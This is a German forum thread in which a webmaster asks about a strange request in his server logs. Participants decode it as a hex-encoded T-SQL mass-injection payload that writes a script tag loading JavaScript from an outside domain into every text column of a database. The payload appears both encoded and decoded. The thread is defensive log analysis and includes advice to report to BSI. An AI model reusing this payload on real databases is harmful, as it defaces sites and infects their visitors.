Was ist das?
Patrick Andrieu
- sonstiges
0 EKKi0 Patrick Andrieu0 Tom
1 Der Martin1 Alexander (HH)0 EKKi
0 MarkX
Hallo alle!
An Requests, die zeigen, dass jemand versucht, eine sich auf einem fremden Server befindlichen .txt mit fremden Code zu öffnen oder einzuschleusen, habe ich mich gewöhnt. Aber solche hier beobachte ich seit wenigen Wochen verstärkt:
++++++++++++
/z_testdir/files/faked.log.current?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
++++++++++++
Jemand eine Idee, was das ist, bzw. schon mal in den Logs beobachtet?
Viele Grüße aus Frankfurt/Main,
Patrick
Mahlzeit Patrick Andrieu,
Jemand eine Idee, was das ist, bzw. schon mal in den Logs beobachtet?
Hm, vielleicht der Versuch, einen Pufferüberlauf zu verursachen?
MfG,
EKKi
Hallo EKKi und Martin!
Hm, vielleicht der Versuch, einen Pufferüberlauf zu verursachen?
Danke Euch beiden. Mit Hilfe des Stichworts »Pufferüberlauf« konnte ich beim Googlen nach »+pufferüberlauf +declare« diese Seite finden, da ist einiges erklärt:
http://entwickler.com/itr/news/psecom,id,41721,nodeid,82.html
Die Angriffe sind zwar relativ selten, doch regelmäßig und scheinen ins Leere zu laufen, doch die ellenlange Zeile verhunzt meine Logauswertungstabelle und fällt deswegen sofort auf ;)
Viele Grüße aus Frankfurt/Main,
Patrick
Hello,
Die Angriffe sind zwar relativ selten, doch regelmäßig und scheinen ins Leere zu laufen, doch die ellenlange Zeile verhunzt meine Logauswertungstabelle und fällt deswegen sofort auf ;)
Du solltest Deine Beobachtungen nebst weitern Logeinträgen vielleicht an das BSI senden?
mailto:Sicherheitsberatung@bsi.bund.de
Vielleicht kann das einigen Firmen helfen, Schaden zu vermeiden.
Liebe Grüße aus Syburg bei Dortmund
Tom vom Berg
Moin Patrick,
Aber solche hier beobachte ich seit wenigen Wochen verstärkt:
[...]
Jemand eine Idee, was das ist, bzw. schon mal in den Logs beobachtet?
habe ich selbst noch nicht gesehen. Aber es sieht nach einer Art Angriff auf eine DB aus. Wenn man den langen, in Hexwerten formulierten String mal im Klartext ausformuliert, sieht der so aus:
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] cet ['+@C+']=''"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--/'+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Scheint so, als erwarte jemand ein bestimmtes DBMS und ein bestimmtes CMS, und versucht dann ein Javascript von http://www3.ss11qn.cn/csrss/w.js in die im CMS gespeicherten Seiten einzuschleusen. Dieses Script bindet wiederum einen unsichtbaren iframe ein - weiter hatte ich keine Lust mehr zu untersuchen.
So long,
Martin
Moin Moin!
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] cet ['+@C+']=''"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--/'+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Sieht für mich auf dem ersten Blick aus wie Microsofts T-SQL für den SQL-Server. Yuck!
Die JS-URL mag FF nicht, "Reported Attack Site". Im JS werden diverse IFrames nachgeladen und irgendwelche Cookies gebastelt, vermutlich um Browser-Fehler auszunutzen.
Alexander
Mahlzeit Alexander (HH),
Sieht für mich auf dem ersten Blick aus wie Microsofts T-SQL für den SQL-Server. Yuck!
Mmmhh, ich könnte ja jetzt fiese Bemerkungen zum Thema MICROS~1, deren Software, die Sicherheit derselbigen und warum das alles absolut nichts Neues ist loslassen ...
MfG,
EKKi
Moin Moin!
Sieht für mich auf dem ersten Blick aus wie Microsofts T-SQL für den SQL-Server. Yuck!
Mmmhh, ich könnte ja jetzt fiese Bemerkungen zum Thema MICROS~1, deren Software, die Sicherheit derselbigen und warum das alles absolut nichts Neues ist loslassen ...
Hab ich doch schon: "Yuck!"
Was bin ich froh, dass ich mich seit gut zwei Jahren nicht mehr mit diesem Access XXL rumschlagen muß.
Unsere beiden Praktikantinnen arbeiten "freiwillig" per Thinstation auf einer Linux-Maschine mit OpenOffice und Mozilla-Produkten. Das geht erstaunlich gut, bis auf die gelegentliche Nörgelei, dass das bei Office 2007 alles ganz anders ist. Ich muß die Mädels nochmal fragen, wie sie den Wechsel vom Fahrschul-Golf auf ihren Nicht-Golf verkraftet haben. ;-)
Alexander
Hallo,
Ich muß die Mädels nochmal fragen, wie sie den Wechsel vom Fahrschul-Golf auf ihren Nicht-Golf verkraftet haben. ;-)
die Frage ist eigentlich gar nicht so abwegig. Als ich damals Fahrstunden genommen habe, hat die Fahrschule während dieser Zeit "mein" Fahrzeug gegen ein neues ausgetauscht. Es war vorher ein Opel Corsa, es war hinterher ein Opel Corsa; es war das gleiche Modell, die gleiche Ausstattung. Trotzdem hatte ich nach dem Wechsel eine gewisse Mühe, mich an das neue, nicht so ausgelatschte Fahrzeug zu gewöhnen.
Als ich den Führerschein dann hatte und mit Mutters Fiat Panda fahren durfte, fiel mir die Umgewöhnung von Opel Corsa auf Fiat Panda dagegen überhaupt nicht schwer, und *das* hat mich dann doch etwas verblüfft.
Schönen Tag noch,
Martin
Moin,
lies mal folgende Meldung dazu: http://www.heise.de/security/Nun-auch-deutsche-Seiten-von-SQL-Massenhacks-betroffen--/news/meldung/108741
MfG
MarkX
Hallo MarkX!
lies mal folgende Meldung dazu: http://www.heise.de/security/Nun-auch-deutsche-Seiten-von-SQL-Massenhacks-betroffen--/news/meldung/108741
Danke für den Link!
Viele Grüße aus Frankfurt/Main,
Patrick